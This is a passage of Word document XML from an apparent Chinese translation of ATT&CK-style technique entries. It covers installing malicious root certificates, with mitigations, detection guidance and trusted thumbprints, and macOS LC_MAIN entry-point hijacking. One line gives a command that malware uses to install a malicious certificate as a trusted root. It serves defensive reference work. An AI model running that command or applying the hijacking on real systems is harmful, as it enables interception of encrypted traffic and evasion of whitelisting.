        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或发现持久性工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867689B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ay Mami</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将恶意证书作为受信任的根证书安装到系统密钥链中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224D15B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="1D481B25" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="69808219" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="020BE475" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="13CFCA17" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72462E96" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>操作系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="097620AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组策略来管理根证书，并且可以将</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:snapToGrid/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:snapToGrid/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>Flags</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>值设置为</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来防止非管理员用户在自己的</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HKCU</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>证书存储中再安装根证书。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7F81F541" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25888DE7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>软件配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B89D94" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:t>HTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>公钥锁定（</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>HPKP</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）用于缓和中间人攻击，即攻击者强制使用预期的错误或欺诈证书来拦截加密通信。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37AAAB30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2976227C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415C4EA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的根证书不太可能经常更改。监控系统上可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>由恶意活动触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装的新证书。检查新系统上预安装的证书，确保不存在不必要或可疑的证书。微软在线并通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>authroot.stl</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供可信任的根证书列表。也可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Sysinternals Sigcheck</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sigcheck[64].exe -tuv</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）转储证书库里的证书，并列出微软证书信任列表未包含的有效证书。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423024FE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>已安装的根证书位于注册表中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[HKLM or HKCU]\Software[\Policies]\Microsoft\SystemCertificates\Root\Certificates\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C07F1E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有一个根证书子集。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>子集中的根证书在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中是一致的，可用于做比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7E549" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>18F7C1FCC3090203FD5BAA2F861A754976C8DD25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60840E77" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>245C97DF7514E7CF2DF8BE72AE957B9E04741E85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BC91E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>3B1EFD3A66EA28B16697394703A72CA340A05BD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF4E3A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>7F88CD7223F3C813818C994614A89C99FA3B5247</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8E81B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>8F43288AD272F3103B6FB1428485EA3014C0BCFE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED0FE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>A43489159A520F0D93D032CCAF37E7FE20A8B419</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687DE51" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>BE36A4562FB2EE05DBB3D32323ADF445084ED656</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568BB9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:t>CDD4EEAE6000AC7F40C3802C171E30148030C072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF26F58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>LC_MAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="00A9D753" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A65FBB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> T1149</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B35DD4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49236023" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2BFB8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5E2C16" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件元数据，恶意代码逆向工程，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76CE1624" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件名或文件路径白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B344E39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EB62CE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE436CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C412B2" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS X 10.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>起，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mach-O </w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件引入了一个名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LC_MAIN </w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的新标头，该标头指向二进制文件的入口点以执行。以前，有两个标头来实现相同的效果：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LC_THREAD </w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> LC_UNIXTHREAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。二进制文件的入口点可以被劫持，以致初始执行流到恶意添加（另一个部分或代码洞穴），然后返回初始入口点，使得受害者不知道有什么不同。通过以这种方式修改二进制文件，可以绕过应用程序白名单，因为文件名或应用程序路径仍然相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371799B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="8044"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="2F39874D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1692" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1F7038E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
